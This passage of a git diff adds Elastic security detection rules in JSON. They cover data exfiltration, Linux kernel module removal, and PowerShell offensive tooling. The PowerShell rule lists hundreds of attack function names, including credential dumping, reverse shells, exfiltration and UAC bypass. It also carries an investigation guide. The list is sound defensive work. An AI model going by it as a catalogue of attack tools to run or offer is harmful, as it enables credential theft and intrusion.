Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your network data. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "cc653d77-ddd2-45b1-9197-c75ad19df66c_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108.json new file mode 100644 index 00000000000..9912da5fe20 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.", + "false_positives": [ + "There is usually no reason to remove modules, but some buggy modules require it. These can be exempted by username. Note that some Linux distributions are not built to support the removal of modules at all." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Module Removal", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and\nprocess.name == \"rmmod\" or (process.name == \"modprobe\" and process.args in (\"--remove\", \"-r\")) and \nprocess.parent.name in (\"sudo\", \"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "references": [ + "http://man7.org/linux/man-pages/man8/modprobe.8.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_109.json b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_109.json new file mode 100644 index 00000000000..00ddd19282c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cd66a5af-e34b-4bb0-8931-57d0a043f2ef_109.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.", + "false_positives": [ + "There is usually no reason to remove modules, but some buggy modules require it. These can be exempted by username. Note that some Linux distributions are not built to support the removal of modules at all." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Module Removal", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"rmmod\" or (process.name == \"modprobe\" and process.args in (\"--remove\", \"-r\")) and \nprocess.parent.name in (\"sudo\", \"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n", + "references": [ + "http://man7.org/linux/man-pages/man8/modprobe.8.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "cd66a5af-e34b-4bb0-8931-57d0a043f2ef_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_10.json b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_10.json new file mode 100644 index 00000000000..1677a72f8be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/cde1bafa-9f01-4f43-a872-605b678968b0_10.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects known PowerShell offensive tooling functions names in PowerShell scripts. Attackers commonly use out-of-the-box offensive tools without modifying the code. This rule aim is to take advantage of that.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential PowerShell HackTool Script by Function Names", + "note": "## Triage and analysis\n\n### Investigating Potential PowerShell HackTool Script by Function Names\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAdversaries often exploit PowerShell's capabilities to execute malicious scripts and perform various attacks. This rule identifies known offensive tooling function names in PowerShell scripts, as attackers commonly use out-of-the-box tools without modifying the code. By monitoring these specific function names, the rule aims to detect and alert potential malicious PowerShell activity.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the script's execution context, such as the user account, privileges, the role of the system on which it was executed, and any relevant timestamps.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate the origin of the PowerShell script, including its source, download method, and any associated URLs or IP addresses.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This rule may generate false positives if legitimate scripts or tools used by administrators contain any of the listed function names. These function names are commonly associated with offensive tooling, but they may also be present in benign scripts or tools.\n- To handle these false positives consider adding exceptions - preferably with a combination of full file path and users.\n\n### Related Rules\n\n- PowerShell Invoke-NinjaCopy script - b8386923-b02c-4b94-986a-d223d9b01f88\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"Add-DomainGroupMember\" or \"Add-DomainObjectAcl\" or\n \"Add-RemoteConnection\" or \"Add-ServiceDacl\" or\n \"Add-Win32Type\" or \"Convert-ADName\" or\n \"Convert-LDAPProperty\" or \"ConvertFrom-LDAPLogonHours\" or\n \"ConvertFrom-UACValue\" or \"Copy-ArrayOfMemAddresses\" or\n \"Create-NamedPipe\" or \"Create-ProcessWithToken\" or\n \"Create-RemoteThread\" or \"Create-SuspendedWinLogon\" or\n \"Create-WinLogonProcess\" or \"Emit-CallThreadStub\" or\n \"Enable-SeAssignPrimaryTokenPrivilege\" or \"Enable-SeDebugPrivilege\" or\n \"Enum-AllTokens\" or \"Export-PowerViewCSV\" or\n \"Find-AVSignature\" or \"Find-AppLockerLog\" or\n \"Find-DomainLocalGroupMember\" or \"Find-DomainObjectPropertyOutlier\" or\n \"Find-DomainProcess\" or \"Find-DomainShare\" or\n \"Find-DomainUserEvent\" or \"Find-DomainUserLocation\" or\n \"Find-InterestingDomainAcl\" or \"Find-InterestingDomainShareFile\" or\n \"Find-InterestingFile\" or \"Find-LocalAdminAccess\" or\n \"Find-PSScriptsInPSAppLog\" or \"Find-PathDLLHijack\" or\n \"Find-ProcessDLLHijack\" or \"Find-RDPClientConnection\" or\n \"Get-AllAttributesForClass\" or \"Get-CachedGPPPassword\" or\n \"Get-DecryptedCpassword\" or \"Get-DecryptedSitelistPassword\" or\n \"Get-DelegateType\" or\n \"Get-DomainDFSShare\" or \"Get-DomainDFSShareV1\" or\n \"Get-DomainDFSShareV2\" or \"Get-DomainDNSRecord\" or\n \"Get-DomainDNSZone\" or \"Get-DomainFileServer\" or\n \"Get-DomainForeignGroupMember\" or \"Get-DomainForeignUser\" or\n \"Get-DomainGPO\" or \"Get-DomainGPOComputerLocalGroupMapping\" or\n \"Get-DomainGPOLocalGroup\" or \"Get-DomainGPOUserLocalGroupMapping\" or\n \"Get-DomainGUIDMap\" or \"Get-DomainGroup\" or\n \"Get-DomainGroupMember\" or \"Get-DomainGroupMemberDeleted\" or\n \"Get-DomainManagedSecurityGroup\" or \"Get-DomainOU\" or\n \"Get-DomainObject\" or \"Get-DomainObjectAcl\" or\n \"Get-DomainObjectAttributeHistory\" or \"Get-DomainObjectLinkedAttributeHistory\" or\n \"Get-DomainPolicyData\" or \"Get-DomainSID\" or\n \"Get-DomainSPNTicket\" or \"Get-DomainSearcher\" or\n \"Get-DomainSite\" or \"Get-DomainSubnet\" or\n \"Get-DomainTrust\" or \"Get-DomainTrustMapping\" or\n \"Get-DomainUser\" or \"Get-DomainUserEvent\" or\n \"Get-Forest\" or \"Get-ForestDomain\" or\n \"Get-ForestGlobalCatalog\" or \"Get-ForestSchemaClass\" or\n \"Get-ForestTrust\" or \"Get-GPODelegation\" or\n \"Get-GPPAutologon\" or \"Get-GPPInnerField\" or\n \"Get-GPPInnerFields\" or \"Get-GPPPassword\" or\n \"Get-GptTmpl\" or \"Get-GroupsXML\" or\n \"Get-HttpStatus\" or \"Get-ImageNtHeaders\" or\n \"Get-Keystrokes\" or\n \"Get-MemoryProcAddress\" or \"Get-MicrophoneAudio\" or\n \"Get-ModifiablePath\" or \"Get-ModifiableRegistryAutoRun\" or\n \"Get-ModifiableScheduledTaskFile\" or \"Get-ModifiableService\" or\n \"Get-ModifiableServiceFile\" or \"Get-Name\" or\n \"Get-NetComputerSiteName\" or \"Get-NetLocalGroup\" or\n \"Get-NetLocalGroupMember\" or \"Get-NetLoggedon\" or\n \"Get-NetRDPSession\" or \"Get-NetSession\" or\n \"Get-NetShare\" or \"Get-PEArchitecture\" or\n \"Get-PEBasicInfo\" or \"Get-PEDetailedInfo\" or\n \"Get-PathAcl\" or \"Get-PrimaryToken\" or\n \"Get-ProcAddress\" or \"Get-ProcessTokenGroup\" or\n \"Get-ProcessTokenPrivilege\" or \"Get-ProcessTokenType\" or\n \"Get-RegLoggedOn\" or \"Get-RegistryAlwaysInstallElevated\" or\n \"Get-RegistryAutoLogon\" or \"Get-RemoteProcAddress\" or\n \"Get-Screenshot\" or \"Get-ServiceDetail\" or\n \"Get-SiteListPassword\" or \"Get-SitelistField\" or\n \"Get-System\" or \"Get-SystemNamedPipe\" or\n \"Get-SystemToken\" or \"Get-ThreadToken\" or\n \"Get-TimedScreenshot\" or \"Get-TokenInformation\" or\n \"Get-TopPort\" or \"Get-UnattendedInstallFile\" or\n \"Get-UniqueTokens\" or \"Get-UnquotedService\" or\n \"Get-VaultCredential\" or \"Get-VaultElementValue\" or\n \"Get-VirtualProtectValue\" or \"Get-VolumeShadowCopy\" or\n \"Get-WMIProcess\" or \"Get-WMIRegCachedRDPConnection\" or\n \"Get-WMIRegLastLoggedOn\" or \"Get-WMIRegMountedDrive\" or\n \"Get-WMIRegProxy\" or \"Get-WebConfig\" or\n \"Get-Win32Constants\" or \"Get-Win32Functions\" or\n \"Get-Win32Types\" or \"Import-DllImports\" or\n \"Import-DllInRemoteProcess\" or \"Inject-LocalShellcode\" or\n \"Inject-RemoteShellcode\" or \"Install-ServiceBinary\" or\n \"Invoke-CompareAttributesForClass\" or \"Invoke-CreateRemoteThread\" or\n \"Invoke-CredentialInjection\" or \"Invoke-DllInjection\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-ImpersonateUser\" or\n \"Invoke-Kerberoast\" or \"Invoke-MemoryFreeLibrary\" or\n \"Invoke-MemoryLoadLibrary\" or\n \"Invoke-Mimikatz\" or \"Invoke-NinjaCopy\" or\n \"Invoke-PatchDll\" or \"Invoke-Portscan\" or\n \"Invoke-PrivescAudit\" or \"Invoke-ReflectivePEInjection\" or\n \"Invoke-ReverseDnsLookup\" or \"Invoke-RevertToSelf\" or\n \"Invoke-ServiceAbuse\" or \"Invoke-Shellcode\" or\n \"Invoke-TokenManipulation\" or \"Invoke-UserImpersonation\" or\n \"Invoke-WmiCommand\" or \"Mount-VolumeShadowCopy\" or\n \"New-ADObjectAccessControlEntry\" or \"New-DomainGroup\" or\n \"New-DomainUser\" or \"New-DynamicParameter\" or\n \"New-InMemoryModule\" or\n \"New-ThreadedFunction\" or \"New-VolumeShadowCopy\" or\n \"Out-CompressedDll\" or \"Out-EncodedCommand\" or\n \"Out-EncryptedScript\" or \"Out-Minidump\" or\n \"PortScan-Alive\" or \"Portscan-Port\" or\n \"Remove-DomainGroupMember\" or \"Remove-DomainObjectAcl\" or\n \"Remove-RemoteConnection\" or \"Remove-VolumeShadowCopy\" or\n \"Restore-ServiceBinary\" or \"Set-DesktopACLToAllowEveryone\" or\n \"Set-DesktopACLs\" or \"Set-DomainObject\" or\n \"Set-DomainObjectOwner\" or \"Set-DomainUserPassword\" or\n \"Set-ServiceBinaryPath\" or \"Sub-SignedIntAsUnsigned\" or\n \"Test-AdminAccess\" or \"Test-MemoryRangeValid\" or\n \"Test-ServiceDaclPermission\" or \"Update-ExeFunctions\" or\n \"Update-MemoryAddresses\" or \"Update-MemoryProtectionFlags\" or\n \"Write-BytesToMemory\" or \"Write-HijackDll\" or\n \"Write-PortscanOut\" or \"Write-ServiceBinary\" or\n \"Write-UserAddMSI\" or \"Invoke-Privesc\" or\n \"func_get_proc_address\" or \"Invoke-BloodHound\" or\n \"Invoke-HostEnum\" or \"Get-BrowserInformation\" or\n \"Get-DomainAccountPolicy\" or \"Get-DomainAdmins\" or\n \"Get-AVProcesses\" or \"Get-AVInfo\" or\n \"Get-RecycleBin\" or \"Invoke-BruteForce\" or\n \"Get-PassHints\" or \"Invoke-SessionGopher\" or\n \"Get-LSASecret\" or \"Get-PassHashes\" or\n \"Invoke-WdigestDowngrade\" or \"Get-ChromeDump\" or\n \"Invoke-DomainPasswordSpray\" or \"Get-FoxDump\" or\n \"New-HoneyHash\" or \"Invoke-DCSync\" or\n \"Invoke-PowerDump\" or \"Invoke-SSIDExfil\" or\n \"Invoke-PowerShellTCP\" or \"Add-Exfiltration\" or\n \"Do-Exfiltration\" or \"Invoke-DropboxUpload\" or\n \"Invoke-ExfilDataToGitHub\" or \"Invoke-EgressCheck\" or\n \"Invoke-PostExfil\" or \"Create-MultipleSessions\" or\n \"Invoke-NetworkRelay\" or \"New-GPOImmediateTask\" or\n \"Invoke-WMIDebugger\" or \"Invoke-SQLOSCMD\" or\n \"Invoke-SMBExec\" or \"Invoke-PSRemoting\" or\n \"Invoke-ExecuteMSBuild\" or \"Invoke-DCOM\" or\n \"Invoke-InveighRelay\" or \"Invoke-PsExec\" or\n \"Invoke-SSHCommand\" or \"Find-ActiveUsersWMI\" or\n \"Get-SystemDrivesWMI\" or \"Get-ActiveNICSWMI\" or\n \"Remove-Persistence\" or \"DNS_TXT_Pwnage\" or\n \"Execute-OnTime\" or \"HTTP-Backdoor\" or\n \"Add-ConstrainedDelegationBackdoor\" or \"Add-RegBackdoor\" or\n \"Add-ScrnSaveBackdoor\" or \"Gupt-Backdoor\" or\n \"Invoke-ADSBackdoor\" or \"Add-Persistence\" or\n \"Invoke-ResolverBackdoor\" or \"Invoke-EventLogBackdoor\" or\n \"Invoke-DeadUserBackdoor\" or \"Invoke-DisableMachineAcctChange\" or\n \"Invoke-AccessBinary\" or \"Add-NetUser\" or\n \"Invoke-Schtasks\" or \"Invoke-JSRatRegsvr\" or\n \"Invoke-JSRatRundll\" or \"Invoke-PoshRatHttps\" or\n \"Invoke-PsGcatAgent\" or \"Remove-PoshRat\" or\n \"Install-SSP\" or \"Invoke-BackdoorLNK\" or\n \"PowerBreach\" or \"InstallEXE-Persistence\" or\n \"RemoveEXE-Persistence\" or \"Install-ServiceLevel-Persistence\" or\n \"Remove-ServiceLevel-Persistence\" or \"Invoke-Prompt\" or\n \"Invoke-PacketCapture\" or \"Start-WebcamRecorder\" or\n \"Get-USBKeyStrokes\" or \"Invoke-KeeThief\" or\n \"Get-Keystrokes\" or \"Invoke-NetRipper\" or\n \"Get-EmailItems\" or \"Invoke-MailSearch\" or\n \"Invoke-SearchGAL\" or \"Get-WebCredentials\" or\n \"Start-CaptureServer\" or \"Invoke-PowerShellIcmp\" or\n \"Invoke-PowerShellTcpOneLine\" or \"Invoke-PowerShellTcpOneLineBind\" or\n \"Invoke-PowerShellUdp\" or \"Invoke-PowerShellUdpOneLine\" or\n \"Run-EXEonRemote\" or \"Download-Execute-PS\" or\n \"Out-RundllCommand\" or \"Set-RemoteWMI\" or\n \"Set-DCShadowPermissions\" or \"Invoke-PowerShellWMI\" or\n \"Invoke-Vnc\" or \"Invoke-LockWorkStation\" or\n \"Invoke-EternalBlue\" or \"Invoke-ShellcodeMSIL\" or\n \"Invoke-MetasploitPayload\" or \"Invoke-DowngradeAccount\" or\n \"Invoke-RunAs\" or \"ExetoText\" or\n \"Disable-SecuritySettings\" or \"Set-MacAttribute\" or\n \"Invoke-MS16032\" or \"Invoke-BypassUACTokenManipulation\" or\n \"Invoke-SDCLTBypass\" or \"Invoke-FodHelperBypass\" or\n \"Invoke-EventVwrBypass\" or \"Invoke-EnvBypass\" or\n \"Get-ServiceUnquoted\" or \"Get-ServiceFilePermission\" or\n \"Get-ServicePermission\" or\n \"Enable-DuplicateToken\" or \"Invoke-PsUaCme\" or\n \"Invoke-Tater\" or \"Invoke-WScriptBypassUAC\" or\n \"Invoke-AllChecks\" or \"Find-TrustedDocuments\" or\n \"Invoke-Interceptor\" or \"Invoke-PoshRatHttp\" or\n \"Invoke-ExecCommandWMI\" or \"Invoke-KillProcessWMI\" or\n \"Invoke-CreateShareandExecute\" or \"Invoke-RemoteScriptWithOutput\" or\n \"Invoke-SchedJobManipulation\" or \"Invoke-ServiceManipulation\" or\n \"Invoke-PowerOptionsWMI\" or \"Invoke-DirectoryListing\" or\n \"Invoke-FileTransferOverWMI\" or \"Invoke-WMImplant\" or\n \"Invoke-WMIObfuscatedPSCommand\" or \"Invoke-WMIDuplicateClass\" or\n \"Invoke-WMIUpload\" or \"Invoke-WMIRemoteExtract\" or \"Invoke-winPEAS\"\n ) and\n not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\"\n ) and\n not file.path : (\n ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\DataCollection\\\\\\\\*\n ) and\n not user.id : (\"S-1-5-18\" or \"S-1-5-19\")\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md", + "https://github.com/BC-SECURITY/Empire" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + 